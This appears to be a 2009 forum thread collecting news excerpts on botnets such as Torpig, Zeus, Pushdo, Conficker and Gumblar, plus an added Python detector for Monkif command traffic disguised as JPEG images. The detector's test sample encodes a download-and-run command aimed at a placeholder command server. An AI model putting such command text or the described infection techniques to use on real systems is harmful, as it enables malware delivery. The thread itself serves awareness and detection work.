May 4, 2009 (Computerworld) - "...it steals personal and financial data. The botnet, known as Torpig or Sinowal, is one of the more sophisticated networks that uses hard-to-detect malicious software to infect computers and subsequently harvest data such as e-mail passwords and online banking credentials. The researchers were able to monitor more than 180,000 hacked computers by exploiting a weakness within the command-and-control network used by the hackers to control the computers. It only worked for 10 days, however, until the hackers updated the command-and-control instructions... Still, that was enough of a window to see the data-collecting power of Torpig/Sinowal. In that short time, about 70GB of data were collected from hacked computers. The researchers stored the data and are working with law enforcement agencies such as the U.S. Federal Bureau of Investigation, ISPs and even the U.S. Department of Defense to notify victims... Torpig/Sinowal can pilfer user names and passwords from e-mail clients such as Outlook, Thunderbird and Eudora while also collecting e-mail addresses in those programs for use by spammers. It can also collect passwords from Web browsers. Torpig/Sinowal can infect a PC if a computer visits a malicious Web site that is designed to test whether the computer has unpatched software, a technique known as a drive-by download attack... The researchers found out that Torpig/Sinowal ends up on a system after it is first infected by Mebroot, a rootkit that appeared around December 2007. Mebroot infects a computer's Master Boot Record (MBR), the first code a computer looks for when booting the operating system after the BIOS runs. Mebroot is powerful since any data that leaves the computer can be intercepted. Mebroot can also download other code to the computer. Torpig/Sinowal is customized to grab data when a person visits certain online banking and other Web sites. 
It is coded to respond to more than 300 Web sites, with the top targeted ones being PayPal, Poste Italiane, Capital One, E-Trade and Chase bank, the paper said*. If a person goes to a banking Web site, a falsified form is delivered that appears to be part of the legitimate site, but asks for a range of data a bank would not normally request, such as a PIN (personal identification number) or a credit card number.... Web sites using SSL (Secure Sockets Layer) encryption are -not- safe if used by a PC with Torpig/Sinowal, since the malicious software will grab information before it is encrypted..."
* http://www.cs.ucsb.edu/~seclab/projects/torpig/index.html


2009-05-05, 21:43

McAfee: 12M added to botnets Q1-2009
- http://newsroom.mcafee.com/article_display.cfm?article_id=3515
May 05, 2009 - "... cybercriminals have taken control of almost 12 million new IP addresses since January, a 50 percent increase since 2008... Cybercriminals are building an army of infected, “zombie” computers to recover from last November’s takedown of a central spam-hosting ISP...
Other Key Findings:
• The Koobface virus has made a resurgence, and more than 800 new variants of the virus were discovered in March alone
• Servers hosting legitimate content have increased in popularity with malware writers to distribute malicious and illegal content
• Cybercriminals are increasing their use of URL redirects and Web 2.0 sites to disguise their location
• Compared to the overall landscape, the Conficker worm represents a small subset of all threat reports. Autorun malware, a vector used by certain Conficker variants, represented only 10% of all detections reported during the first quarter.
To view the full report, please visit: http://www.mcafee.com/threatsreport ."


2009-05-08, 14:02

Botnet self-destructs - "Zeus" command
- http://voices.washingtonpost.com/securityfix/2009/05/zeustracker_and_the_nuclear_op.html
May 7, 2009 - "... Hüssy oversees Zeustracker*, a Web site listing Internet servers that use Zeus**, a kit sold for about $700 on shadowy cyber criminal forums to harvest data from computers infected with a password stealing Trojan horse program. One of Zeus's distinguishing features is a tool that helps each installation on a victim PC look radically different from the next as a means to evade detection by anti-virus tools. According to Hüssy, among Zeus's many features is the "kos" option, which stands for "kill operating system"... In early April, Hüssy began tracking a Zeus control server used to receive data stolen from a botnet of more than 100,000 infected systems, mostly located in Poland and Spain. While investigating this newfound Zeus control server, he noticed something unusual: the "kill operating system" had just been issued to all 100,000 infected systems. Hüssy said he has no idea why the botnet was destroyed... Currently, about one-third of the sites listed at Zeustracker are hacked or free Web services..."
* https://zeustracker.abuse.ch/monitor.php?filter=online
** http://rsa.com/blog/blog_entry.aspx?id=1274


2009-05-12, 23:07

- http://www.darkreading.com/shared/printableArticle.jhtml?articleID=217400548
May 12, 2009 - "A pirated version of the new Windows 7 operating system release candidate that has been circulating around the Internet is also building out a botnet. The rogue OS, which is rigged with a Trojan downloader*, at one point had around 27,000 bots in its control as of May 10, when researchers took over the command and control server that communicated with the bots and served them additional malware. At the height of the botnet buildup, the botmaster was recruiting over 200 machines an hour... Damballa researchers on Sunday grabbed control of the C&C domain, but they say this is likely just one of many versions of rogue Windows 7 OS... Damballa's Cox says most traditional antivirus software is unable to detect the pirated Windows 7 Trojan because the OS itself is infected and most AV solutions don't yet support Windows 7..."
* http://blog.trendmicro.com/cybercriminals-launch-tainted-windows-7-rc/


2009-05-13, 21:38

- http://blog.trendmicro.com/pushdocutwail-%E2%80%93-the-art-of-spamming/
May 12, 2009 - "... One of the biggest spamming botnets out there is Pushdo. This botnet has managed to stay under the radar since 2007 even though it has been reported to be responsible for a huge percentage of the spam worldwide. It has even managed to make it consistently to the Top 5 largest botnets without ever reaching number one. There are reports of 7.7 billion spammed emails per day coming from this botnet, which puts it in the Top 2 largest spamming botnets worldwide... One of the latest batches contains an executable which displayed popup ads to the user, most probably from an advertiser who paid good money for the mass-deployment of their software. The only component that is always present is the spamming engine, which some antivirus vendors have dubbed as Cutwail..."

- http://blog.trendmicro.com/pushdocutwail-%E2%80%93-from-russia-with-love-part-2-of-5/
May 13, 2009 - "... The famous Storm botnet from 2008 had strong links to the so-called Russian Business Network operating out of St. Petersburg, and from our research it appears that Pushdo is linked to the Moscow area. Like other spam botnets Pushdo’s spamming component, known as Cutwail, sends spam in waves, each advertising a particular service. Normally these consist of porn, pharmacy spam etc – but it was when we started to see ads for Salsa classes and Construction services that we became really interested... As part of our research we contacted the gang on one of the numbers they provided, posing as a potential customer of their spamming services. As customer service satisfaction goes these guys were very helpful, providing us with bank account details that we could pay them through, and even offering to pick up the money in person if we were based in Moscow. On top of that they would throw in a free website design to promote our business, and offered to craft their “advertising mail services” (that’s unsolicited spam to you and me) to best avoid anti-spam signatures..."

(Screenshots available at both URLs above.)


2009-05-18, 23:13

- http://www.secureworks.com/research/blog/index.php/2009/05/12/following-the-trojan-trail/
May 12, 2009 - "... The "Finjan botnet" appears to be large... credit to FireEye for trying to track down the Finjan Botnet that Finjan first reported on. Reading through the Finjan and FireEye write-ups, one is able to reconstruct the trail and also discover the path taken. We can see two major types of Trojans that play a part in this. We have the VBInject Trojan and the AutoIt Trojan... There are two servers on the same network to which -VBInject- phones home: x.x.62.2 and x.x.21.186. The server at x.x.21.186 is no longer responsive and appears down at this time. The server at x.x.62.2 is still up and DNS still responds with that IP address for the domain name used in these attacks. If you actually try to browse to that domain though, you will not arrive at this server. As you can see from reading the FireEye article, the Trojan phones home to /ldr/loadlist.php. It downloads more malware from /ldr/dl/. One of the Trojans it downloads is -AutoIt-... This is the AutoIt Trojan phoning home and the response is to download around 15 pieces of malware...
As you can see by following the trail, gone are the days where you have just one Trojan infection. When you become infected today, it is best to just do a complete reformat of your machine instead of trying to recover it, because you really don’t know how many infections you have. I have read plenty of articles where someone cleans their machine and they think everything is fine only to find more malware days to weeks later.
There is not any perfect AV tool; there is no perfect solution for any one problem. Your best defense is to practice what is called defense in depth and to only go to known websites. Don’t open mail from people you don’t know and be careful opening attachments from people that you do know. Update your OS and software regularly, including AV. Just having AV does not mean that you are protected; you also have to keep it updated."
• FireEye Blog - http://blog.fireeye.com/research/2009/04/botnetweb-part-ii.html
• Finjan article - http://www.finjan.com/MCRCblog.aspx?EntryId=2237
• Prevx shows ZCHMIB.EXE - http://www.prevx.com/filenames/1521641268775071064-X1/ZCHMIB.EXE.html
• ThreatExpert shows TDSS/Seneka activity - http://www.threatexpert.com/report.aspx?md5=5a1a6f4e83900e86c3e7dc62554318ac

(More detail and screenshots available at the Secureworks URL above.)

// http://forums.spybot.info/showpost.php?p=306776&postcount=25

2009-05-21, 12:56

Conficker continues to spread
- http://viewfromthebunker.com/2009/05/20/conficker-continues-to-spread/
May 20, 2009 - "... the Symantec threat intelligence team estimates there are 50,000 newly infected PCs a day right now... the US, Brazil and India top the charts."

(Chart available at the URL above.)

- http://isc.sans.org/diary.html?storyid=5860


2009-06-17, 18:35

Golden Cash botnet
- http://www.finjan.com/MCRCblog.aspx?EntryId=2281
June 17, 2009 - "... A user visits a legitimate compromised website which contains a malicious Iframe. This Iframe causes the victim’s browser to pull the exploit code from a server armed with the exploit toolkit. Upon successful exploitation, a special build of a Trojan, created for the attacker, is pulled from the Golden Cash server. Once installed, the Trojan reports back to the Golden Cash server and the attacker’s account at Golden Cash is credited with currency. The first instruction sent by Golden Cash to the victim’s machine is to install an FTP-grabber (to steal FTP-credentials). Our research found about 100,000 stolen FTP-credentials on the Golden Cash server. The victim’s machine is now in a pool of infected machines controlled by Golden Cash and being auctioned to other criminals, using a different website for buyers. From time to time, the victim’s machine gets instructions to install malware on behalf of the criminal-customer. The Trojan on the victim machine reports back to Golden Cash on each successful installation of the customer’s malware and the criminal-customer account is charged with currency. The victim machine is back in the ‘available for more infections’ pool.... the botnet spreads using distributors. For each distributor, a special bot build is created. The special build assists the cybercriminal to track the installations of each distributor... Some of the stolen FTP-credentials were used to inject malicious Iframes into the webpages that were stored on the FTP server. The reason for this was to infect more machines and generate organic growth. The C&C server is hosted in Texas, US; the registrant country is China. The “proxy” website that tunnels traffic to the C&C server is hosted in Krasnodar, Russia."

(Screenshots available at the URL above.)


2009-07-08, 14:43

SPAM - from Waledac...
- http://www.eset.com/threat-center/blog/?p=1285
July 7, 2009 - "... After 4th July, we have noticed an increase in the number of emails in circulation, and this week will be even more active. We believe that, like other campaigns, this one will last at least 15 days. However, what many readers may be wondering is why Waledac was “asleep” so many months. The reality is that the Trojan wasn’t spreading at that point. However, the botnet that was built with Waledac, remained as active as ever; working mainly to achieve their most important goal: to send spam. At ESET Latinamerica’s Laboratory, we made some tests to enable us to share information with users that shows the importance of staying uninfected: if my computer is infected with Waledac, how much spam does it send? We infected a computer in the laboratory with one of the Waledac trojans...
After that, we used a tool to monitor network traffic to see how many emails were sent by the botnet since the system became infected. We made an initial measurement in 4 stages over a period of one hour (at different times of day), and the results were as follows:
• Stage 1: between 18:00 and 19:00 hs. 6968 emails were sent
• Stage 2: between 20:30 and 21:30 hs. 7148 emails were sent
• Stage 3: between 10:00 and 11:00 hs. 5610 emails were sent
• Stage 4: Between 13:00 and 14:00 hs. 6568 emails were sent
Taking the average of emails sent per hour (6548 emails), it is estimated that an infected computer can send about 150,000 emails a day. To be even clearer, that represents nearly two emails per second... If we consider that the network is estimated to consist of at least 20,000 infected computers, it can be seen that the botnet has a theoretical spam-sending capacity of 3 billion emails daily... many users will now understand why their computers work so slowly when their systems are infected..."


2009-07-17, 02:16

- http://www.techworld.com/security/news/index.cfm?newsID=119223
15 July 2009 - "Creators of Waledac malware have used the Conficker botnet as a tool to spread malware of their own, marking the first time Conficker was made available for hire, according to Cisco. Writing in its mid-yearly security report*, Cisco said that this was symptomatic of a wider trend of malware purveyors using established business practices to expand their illegal enterprises. Cisco likened the arrangement between Waledac and Conficker to a partner ecosystem, a term Cisco uses to describe its collaboration with other vendors. Waledac used the Conficker distribution channel to send spam and to expand its own botnet... Web sites that are infected to download malware to unsuspecting visitors will increase, the report predicted. These sites represent nearly 90 percent of all web-based threats, the report says. Creation of botnets would be a particular goal of this type of malware..."
* http://www.cisco.com/en/US/prod/vpndevc/annual_security_report.html


2009-07-24, 13:41

Botnet money...
- http://www.viruslist.com/en/analysis?pubid=204792068
July 22, 2009 - "In the past ten years, botnets have evolved from small networks of a dozen PCs controlled from a single C&C (command and control center) into sophisticated distributed systems comprising millions of computers with decentralized control. Why are these enormous zombie networks created? The answer can be given in a single word: money. A botnet, or zombie network, is a network of computers infected with a malicious program that allows cybercriminals to control the infected machines remotely without the users’ knowledge. Zombie networks have become a source of income for entire groups of cybercriminals. The invariably low cost of maintaining a botnet and the ever diminishing degree of knowledge required to manage one are conducive to growth in popularity and, consequently, the number of botnets... Botnet owners or developers who have been prosecuted can be counted on the fingers of two hands. Which is not the case with botnets that are live on the Internet: the number of these has exceeded 3600... Without help from users, combating botnets cannot be effective. It is home computers that make up the lion’s share of the enormous army of bots. Neglecting to stick to simple security rules, such as using antivirus software, using strong account passwords and disabling the AutoPlay feature for removable media, can result in your computer becoming another botnet member, providing cybercriminals with your data and resources..."


2009-08-15, 00:16

Twitter-based botnet command channel
- http://asert.arbornetworks.com/2009/08/twitter-based-botnet-command-channel/
August 13, 2009 - "While digging around I found a botnet that uses Twitter as its command and control structure. Basically what it does is use the status messages to send out new links to contact, then these contain new commands or executables to download and run. It’s an infostealer operation. The account in question is under analysis by Twitter’s security team. I spotted it because a bot uses the RSS feed to get the status updates. As for the original bot in question that fetches the updates, here’s the VirusTotal analysis*, where you can see it’s detected by 19/41 (46.34%) AV tools under evaluation. We can look at the status messages and discover more nefarious activity; the bot’s hiding new malcode which is poorly detected this way. The original link from the malcode came from a ShadowServer nightly link report, which they make available to folks. Many thanks to them...
UPDATE 14 Aug 2009 - Via bit.ly, some statistics that suggest the malcode has infected a couple hundred PCs, mostly in Brazil..."

(More detail at the URL above.)

* http://www.virustotal.com/analisis/6a6c334ffe5c8e60b1de37582b73a642c68d2b02b0284000d24c93f899122139-1249801350
File 40d09b7d94da70ede50866c55f48613c-2358.txt received on 2009.08.09 07:02:30 (UTC)
Result: 19/41 (46.34%)

* http://www.virustotal.com/analisis/14fd37ef063f3c13d667e7483803a17ec493395a0d0e0365da4bed60272f311e-1250187288
File gbpm.exe received on 2009.08.13 18:14:48 (UTC)
Result: 9/41 (21.95%)

- http://www.symantec.com/connect/blogs/twittering-botnets
August 14, 2009

Infostealer.Bancos heatmap
- http://www.symantec.com/connect/imagebrowser/view/image/974211/_original

- http://www.symantec.com/connect/blogs/downloader-micro-blogging-and-prophecy
August 16, 2009 - "... A new variant of this threat has emerged that uses not only Twitter but also another social networking and micro-blogging site Jaiku.com. Symantec detects this Trojan as Downloader.Sninfs.B*. Like the previous variant, Downloader.Sninfs.B also attempts to get URLs from obfuscated Twitter status messages. However, if that attempt fails, the Trojan will use the RSS feed from an account registered on Jaiku .com to obtain the location of remote files..."
* http://www.symantec.com/business/security_response/writeup.jsp?docid=2009-081603-5537-99&tabid=2
Discovered: August 16, 2009 = "... may be saved as the following files:
%Temp%\[SET OF RANDOM NUMBERS]\gbpm.exe
%Temp%\[SET OF RANDOM NUMBERS]\gbpm.dll
%Temp%\[SET OF RANDOM NUMBERS]\update.exe (copy of gbpm.exe) ..."


2009-08-24, 18:43

Ilomo botnet - All your info are belong to us
- http://blog.trendmicro.com/all-your-info-are-belong-to-us/
August 24, 2009 - "... Ilomo has (been) active for several years now, and like Pushdo has done so without attracting too much unwanted attention from the security industry. Like Pushdo, the Ilomo threat is quite modular in nature which makes it difficult to see the actions of the overall threat. Added to this is the fact that it uses a commercial virtual machine obfuscator, significantly adding to the effort involved in reverse engineering the malware binaries. Ilomo has two key components to its business plan. The first is good old fashioned information stealing. Ilomo injects its code into the browser and monitors the internet connection waiting for the user to connect to one of over 4000 banking, financial or webmail sites. Not content with simply stealing the user’s credentials, Ilomo can also “piggyback” on the user’s session – transferring funds from an infected user’s account and making a mockery of the bank’s secure login system. Ilomo will also harvest all other login credentials from the machine – ftp, web servers, local administrators etc. These are then used to spread itself across the network and to take control of web servers online, which it will use to host new versions of the malware... Ilomo’s second source of revenue is selling “anonymity as a service”. Every infected Ilomo machine acts as a proxy so that criminals can route their illegal activities through different networks and countries. In addition to hiding the criminals’ identity this proxy network is very useful for defeating another defense built into many banking sites – namely that they can only be accessed from certain countries. If a criminal needs to access a Brazilian bank, they simply use an infected Ilomo machine in Brazil to route the connection..."

(Screenshot available at the URL above.)


2009-09-12, 14:26

Botweb using compromised Linux servers
- http://blog.stopbadware.org/2009/09/11/botweb-using-compromised-linux-servers
9.11.2009 - "Over at the Unmask Parasites blog, periodic BadwareBusters.org contributor Denis reports on a botweb ... that he’s been investigating:
'What we see here is a long awaited botnet of zombie web servers! A group of interconnected infected web servers with a common control center involved in malware distribution. To make things more complex, this botnet of web servers is connected with the botnet of infected home computers (the malware they serve infects computers and turns them into zombies).'
The blog post* contains a much more thorough analysis of the issue and is worth a read, especially if you work for a hosting provider or manage Linux-based web servers..."
* http://blog.unmaskparasites.com/2009/09/11/dynamic-dns-and-botnet-of-zombie-web-servers/


2009-09-16, 22:57

Botnet computing power...
- http://blog.trendmicro.com/the-internet-infestation-how-bad-is-it-really/
Sep. 16, 2009 - "Industry experts have previously estimated that, on average, a compromised machine remains infected for 6 weeks. However, our latest research indicates that this estimate is far from accurate. During the analysis of approximately 100 million compromised IP addresses, we identified that half of all IP addresses were infected for at least 300 days. That percentage rises to eighty percent if the minimum time is reduced to a month... The news only gets worse from that point. While three-fourths of the IP addresses in our study were identified with consumer users, the remaining quarter belong to enterprise users. Because a single IP address for these users is typically identified with a single gateway which may, in turn, be connected to multiple machines in an internal network, the actual percentage of enterprise machines affected by malware may be higher than the IP address data suggests. Once a machine becomes compromised, it is not unusual to find it has become part of a wider botnet. Botnets frequently cause damage in the form of malware attacks, fraud, information theft and other crimes. In 2009, virtually all malware tracked by Trend Micro experts is used by cybercriminals to steal information... Overall, botnets control more compromised machines than had been previously believed. Only a handful of criminals (likely a few hundred) have more than 100 million computers under their control. This means that cybercriminals have more computing power at their disposal than the entire world’s supercomputers combined. It’s no wonder then that more than 90 percent of all e-mail worldwide is now spam..."

(More detail and charts available at the URL above.)


2009-09-22, 18:06

Conficker still defeats experts
- http://www.theinquirer.net/inquirer/news/1534307/conflicker-defeats-experts
22 September 2009 - "... The worm has infected more than five million computers in a botnet that could take out the Internet in some countries... Rodney Joffe, a director of the Conficker Working Group formed to defeat the worm said, "The general agreement in the security world is that Conficker is the largest threat facing us from a cyber crime point of view." The worm, which spreads rapidly among personal computers by exploiting a flaw in Microsoft Windows, first surfaced last November. According to Joffe, "it has proven to be extremely resilient. It's almost impossible to remove." Infected PCs are dragooned into a "botnet" controlled by the Conficker worm's unknown authors, which security researchers fear could be used to launch cyber attacks over the Internet..."
- http://www.confickerworkinggroup.org/wiki/pmwiki.php/ANY/InfectionTracking

Conficker C P2P Protocol and Implementation
- http://mtc.sri.com/Conficker/P2P/
Last Update: 21 September 2009
> http://mtc.sri.com/Conficker/P2P/#overview

- http://isc.sans.org/tag.html?tag=conficker

Conficker Eye Chart
- http://www.confickerworkinggroup.org/infection_test/cfeyechart.html


2009-09-29, 19:41

Botnet hides its commands...
- http://www.secureworks.com/research/blog/index.php/2009/09/29/monkifdlkhora-botnet-hiding-its-commands-as-jpeg-images/
September 29, 2009 - "SecureWorks... has been carefully monitoring the activity of the Monkif/DlKhora botnet. This bot is an example of a Downloader trojan, in that its primary purpose is to receive instructions to download and execute other malware. The trojan also attempts to disable anti-virus and personal firewall software to maintain its foothold on the system. One interesting technique the Monkif botnet utilizes to hide its intent on the network is to encode the instructions to appear as if the command and control server is returning a JPEG file. The server sets the HTTP Content-Type header to “image/jpeg” and prefaces the bot commands with a fake 32-byte JPEG header. The bot checks if the header matches and decodes the rest of the response to retrieve its commands. The commands are encoded using a single byte XOR with 0x4. The malware that CTU has observed being installed by Monkif is a BHO (Browser Helper Object) trojan commonly referred to as ExeDot, which performs Ad Hijacking and Ad Clicking. The botnet makes no attempt to pad the commands to make the data size representative of a true JPEG. In addition, the data will not parse to a legitimate JPEG. These attributes may provide opportunities for generic countermeasures to detect the traffic by identifying malformed image data..."
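The "generic countermeasure" SecureWorks hints at, as an added example that is not part of the original post or of SecureWorks' tooling: a checker that walks the JPEG segment structure of an HTTP response claiming image/jpeg, flags bodies that do not parse, and, for analysis, tries the single-byte XOR 0x4 decode on whatever follows the 32-byte fake header. The real Monkif header bytes and command syntax are not on the page, so the fake header and command text below are constructed placeholders.

```python
import string

FAKE_HEADER_LEN = 32   # Monkif prefaces its commands with a 32-byte fake JPEG header
XOR_KEY = 0x04         # single-byte XOR key reported for the command encoding


def looks_like_jpeg(data: bytes) -> bool:
    """Structural JPEG check: SOI (FF D8), then a chain of FF xx segments each
    carrying a 2-byte big-endian length, up to SOS (FF DA), after which scan
    data runs until EOI (FF D9). Any inconsistency means 'not a real JPEG'."""
    if len(data) < 4 or data[:2] != b"\xff\xd8":
        return False
    pos = 2
    while pos + 4 <= len(data):
        if data[pos] != 0xFF:
            return False
        marker = data[pos + 1]
        if marker in (0x01, 0xD8) or 0xD0 <= marker <= 0xD7:
            pos += 2                      # standalone markers carry no length
            continue
        if marker == 0xD9:                # EOI before any scan data: accept
            return True
        seg_len = int.from_bytes(data[pos + 2:pos + 4], "big")
        if seg_len < 2 or pos + 2 + seg_len > len(data):
            return False                  # bogus or truncated segment length
        if marker == 0xDA:                # SOS: entropy-coded data must end in EOI
            return b"\xff\xd9" in data[pos + 2 + seg_len:]
        pos += 2 + seg_len
    return False


def xor_decode(payload: bytes, key: int = XOR_KEY) -> bytes:
    """Single-byte XOR is its own inverse, so this both encodes and decodes."""
    return bytes(b ^ key for b in payload)


def mostly_printable(data: bytes, threshold: float = 0.9) -> bool:
    if not data:
        return False
    printable = set(string.printable.encode())
    return sum(b in printable for b in data) / len(data) >= threshold


def inspect_response(headers: dict, body: bytes) -> dict:
    """Verdict for one HTTP response. 'suspicious' means the server claimed
    image/jpeg but the body does not parse as a JPEG; 'decoded' holds the
    XOR-0x4 plaintext after the fake header when it comes out as readable text."""
    ctype = headers.get("Content-Type", "").lower()
    claims = ctype.startswith("image/jpeg")
    parses = looks_like_jpeg(body)
    verdict = {"claims_jpeg": claims, "parses_as_jpeg": parses,
               "suspicious": claims and not parses, "decoded": None}
    if verdict["suspicious"] and len(body) > FAKE_HEADER_LEN:
        candidate = xor_decode(body[FAKE_HEADER_LEN:])
        if mostly_printable(candidate):
            verdict["decoded"] = candidate
    return verdict


# Constructed minimal real JPEG: SOI, a 16-byte APP0/JFIF segment, an 8-byte SOS
# segment, two bytes of scan data, EOI. Enough structure for the walker above.
REAL_JPEG = (b"\xff\xd8"
             + b"\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
             + b"\xff\xda\x00\x08\x01\x01\x00\x00\x3f\x00"
             + b"\x12\x34" + b"\xff\xd9")

# Constructed Monkif-style body (placeholder header and command text, not the
# real bot protocol): 32 bytes that start like a JPEG but carry a zero segment
# length, followed by XOR-0x4 encoded download/run instructions.
COMMAND_TEXT = b"download http://c2.example.invalid/update.bin\nrun update.bin\n"
FAKE_RESPONSE = b"\xff\xd8\xff\xe0" + b"\x00" * 28 + xor_decode(COMMAND_TEXT)

if __name__ == "__main__":
    for label, body in (("real", REAL_JPEG), ("monkif-style", FAKE_RESPONSE)):
        print(label, inspect_response({"Content-Type": "image/jpeg"}, body))
```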


2009-10-17, 20:55

2,000 legit sites serve malware
- http://www.theregister.co.uk/2009/10/16/gumblar_mass_web_compromise/
16 October 2009 - "Cybercriminals have laced about 2,000 legitimate websites with a potent malware cocktail that surreptitiously attacks people who browse to them, a security researcher warned Friday. Unlike past outbreaks of the mass web attack known as Gumblar, this round actually plants exploit code on the website servers themselves. Curiously, the directory and file name of the malicious payload is in most cases unique and identical to a legitimate file that existed on the website. The trick makes it extremely difficult for webmasters and anti-malware programs to detect the threats. "This is an ugly can of worms," said Mary Landesman, the ScanSafe security researcher who warned of the mass attack*. "Any time you see a new technique evolve like this the concern is we'll be seeing much more of this in the future, and certainly it complicates the remediation of the compromised website." Previously, Gumblar planted links in thousands of compromised websites that silently redirected users to a handful of servers that hosted the exploits. That method allowed white hats to foil the attack by shutting down one or two domains. With the malware embedded directly in the compromised websites, the take-down process is significantly more time consuming. Also making matters hard for Landesman to get the sites cleaned up: Most of the websites belong to small businesses that cater to non-English speakers..."
Gumblar Website Botnet Awakes
* http://blog.scansafe.com/journal/2009/10/15/gumblar-website-botnet-awakes.html

** http://www.virustotal.com/analisis/7c9d0a66a44beb3f6713ae731708fcd041fe1d46b84eaae44caf7f0866f905d1-1255452285
File HiwA7.dat received on 2009.10.13 16:44:45 (UTC)
Result: 7/41 (17.07%)

Zeus Bot Joins Gumblar Attacks
- http://blog.scansafe.com/journal/2009/10/20/zeus-bot-joins-gumblar-attacks.html
October 20, 2009 - "... unlike traditional compromises which simply inject pointers to malware hosted on an attacker-owned domain, in these attacks the compromised domain is also acting as host for the malware itself. This method of attack complicates remediation via technologies that rely on blacklisting because the number of compromised websites (now acting as malware hosts) is in the thousands. It also makes the Gumblar compromised websites a triple threat - potentially exposing visitors to the malware contained on the compromised site, and the malware loaded from ncenterpanel.cn*, and the malware loaded from other compromised sites."
* http://google.com/safebrowsing/diagnostic?site=ncenterpanel.cn/
"...the last time suspicious content was found on this site was on 2009-10-28. Malicious software includes 1209 trojan(s), 876 scripting exploit(s)... this site has hosted malicious software over the past 90 days. It infected 487 domain(s)..."


2009-10-20, 15:40

Zbot botnet - new phishing attacks
- http://www.darkreading.com/shared/printableArticle.jhtml?articleID=220700200
Oct. 19, 2009 - "The massive Zbot botnet that spreads the treacherous Zeus banking Trojan has been launching a wave of relatively convincing phishing attacks during the past few days - the most recent of which is a phony warning of a mass Conficker infection from Microsoft that comes with a free "cleanup tool." The wave of attacks began early last week targeting corporations in the form of email messages that alerted victims of a "system upgrade." Email is accompanied by poisoned attachments and links; in some cases it poses as a message from victims' IT departments, including their actual email domains, and alerts them about a "security upgrade" to their email accounts. The message then refers victims to a link to reset their mailbox accounts, and the link takes them to a site that looks a lot like an Outlook Web Access (OWA) page (PDF), but instead infects them with the Zeus Trojan. Today, researchers at F-Secure spotted the botnet spamming out malware-laden email that tries to trick recipients with convincing lure messages that say, "On October 22, 2009 server upgrade will take place"... The Shadowserver Foundation has seen multiple versions of Zeus-related attacks lately, including the Conficker "cleanup utility" that poses as an email from Microsoft, according to Andre DiMino, director of Shadowserver. And the targeted Outlook attacks use real domains: "What is also interesting about the recent campaign is that the email comes from the targeted user's own domain with an 'administrator' prefix. The link is disguised to look like it's from an update server on the local domain, but instead points to the malicious location"..."

- http://atlas.arbor.net/
"... We are also seeing email spam attacks to spread malware from the Bredolab botnet, from the ZBot botnet, and a Rogue AV downloader purporting to be an anti-conficker system update. "


2009-10-29, 17:38

Bredolab trojan - botnet targets Facebook users
- http://www.computerworld.com/s/article/9140058/Massive_bot_attack_spoofs_Facebook_password_messages?taxonomyId=16
October 28, 2009 - "A massive bot-based attack has been hitting Facebook users, with nearly three-quarters of a million users receiving fake password reset messages (email SPAM), according to security researchers. The attack, which began Monday afternoon, according to e-mail security vendor Cloudmark*, targets Facebook users with a spoofed message that claims recipients' Facebook passwords have been reset as a security measure. The messages, which come bearing subject lines such as "Facebook Password Reset Confirmation," include a file attachment that supposedly contains the new password. In fact, the attached .zip file includes a Trojan downloader, dubbed "Bredlab" by some antivirus companies, "Bredolab" by others... At least 8% of the users who have received one of the fake messages have tagged it as legitimate, going to the trouble of pulling the message from their junk folder - where Cloudmark has placed it - because they think it's real... Cloudmark has no data on how many users were actually duped into opening the .zip file and running the enclosed .exe that installs Bredolab..."
* http://news.cnet.com/8301-27080_3-10385498-245.html

> http://forums.spybot.info/showpost.php?p=344089&postcount=166


2009-11-02, 13:03

Conficker infects 7M computers
- http://www.computerworld.com/s/article/9140171/After_one_year_Conficker_infects_7M_computers?
October 30, 2009 - "The Conficker worm has passed a dubious milestone. It has now infected more than 7 million computers, security experts estimate. On Thursday, researchers at the volunteer-run Shadowserver Foundation logged computers from more than 7 million unique IP addresses*, all infected by the known variants of Conficker. They have been able to keep track of Conficker infections by cracking the algorithm the worm uses to look for instructions on the Internet and placing their own "sinkhole" servers on the Internet domains it is programmed to visit. Conficker has several ways of receiving instructions, so the bad guys have still been able to control PCs, but the sinkhole servers give researchers a good idea how many machines are infected..."
* http://www.confickerworkinggroup.org/wiki/pmwiki.php/ANY/InfectionTracking

Conficker Eye Chart
- http://www.confickerworkinggroup.org/infection_test/cfeyechart.html


2009-11-02, 14:25

Gumblar attacks spread to thousands of new sites
- http://threatpost.com/en_us/blogs/gumblar-attacks-spread-thousands-new-sites-103009
October 30, 2009 - "Gumblar, the nasty bit of malware that was part of a mass SQL injection on legitimate Web sites this spring, is continuing to spread and its creators have been busy lately, compromising hundreds of new sites, leading to a massive new wave of infections of end-user PCs... In Gumblar's case, the iFrame redirection is the tactic of choice and it has been quite effective. In its original form Gumblar was redirecting victims to one of two remote sites, Gumblar .cn or Martuz .cn. The latest incarnation is pointing victims to thousands of servers in more than 200 countries that are now spreading Gumblar, according to research by Michael Molsner of Kaspersky Lab*. More than 7,200 servers spreading Gumblar are in the U.S., and many of the sites compromised around the globe are in the .gov and .edu domains. "Our accumulated data for one week showed 443748 access hits in total - and that is only a part of the whole incident. For several days after we noticed this new threat and added detection of the malicious files targeting Adobe Reader and Flash Player, there was surprisingly little talk about it in IT security circles. The 'new gumblar' took some time to get noticed more widely and _still_ seems unnoticed by many. However, it is very active indeed and as a side effect several PC vendors' support lines have been flooded with queries about sudden reboots etc. There are also reports that machines infected with a buggy version of gumblar fail to boot completely, leaving the screen black and only the mouse pointer visible."
Experts say that many of the machines that have been infected with Gumblar and other similar pieces of malware often are re-infected once they've been cleaned as users don't realize that their browsers are vulnerable and that the seemingly safe sites they're visiting are in fact serving malware."
* http://www.viruslist.com/en/weblog?weblogid=208187886
October 30, 2009

- http://google.com/safebrowsing/diagnostic?site=gumblar.cn/
"... last time Google visited this site was on 2009-11-01, and the last time suspicious content was found on this site was on 2009-11-01... It infected 6073 domain(s)..."
- http://google.com/safebrowsing/diagnostic?site=martuz.cn/
"... last time Google visited this site was on 2009-11-01, and the last time suspicious content was found on this site was on 2009-11-01... It infected 8328 domain(s)..."


2009-11-04, 14:10

Fast Flux by the Numbers - Q3 2009
- http://asert.arbornetworks.com/2009/11/q3-2009-fast-flux-by-the-numbers/
